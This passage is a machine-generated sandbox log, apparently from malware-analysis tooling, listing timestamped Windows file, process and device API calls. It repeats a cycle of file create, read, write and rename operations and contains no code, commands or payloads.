"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,393", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,403", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,403", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,413", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,413", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,423", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,423", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,433", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,443", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,453", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,453", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,463", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "NtCreateFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,463", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,473", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,473", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,493", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,503", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,503", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,503", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,503", "api": "NtSetInformationFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:49,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,513", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,523", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,523", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:49,533", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,533", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,533", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,543", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,543", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,553", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,553", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,563", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,563", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,573", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:49,573", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,583", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,583", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,583", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,593", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,613", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,613", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,624", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,624", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,634", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,634", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,634", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,634", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,644", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,644", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:49,654", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,654", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,654", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,664", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,664", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:49,684", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,684", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,684", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,704", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,714", "api": 
"NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,714", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,714", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,724", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,724", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,724", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtSetInformationFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,744", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,744", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,754", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,754", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,754", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,754", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,764", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,764", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,764", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,764", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,764", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:49,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,774", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,794", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,794", 
"api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,794", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:49,794", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,804", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,804", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,814", "api": "NtWriteFile"}, 
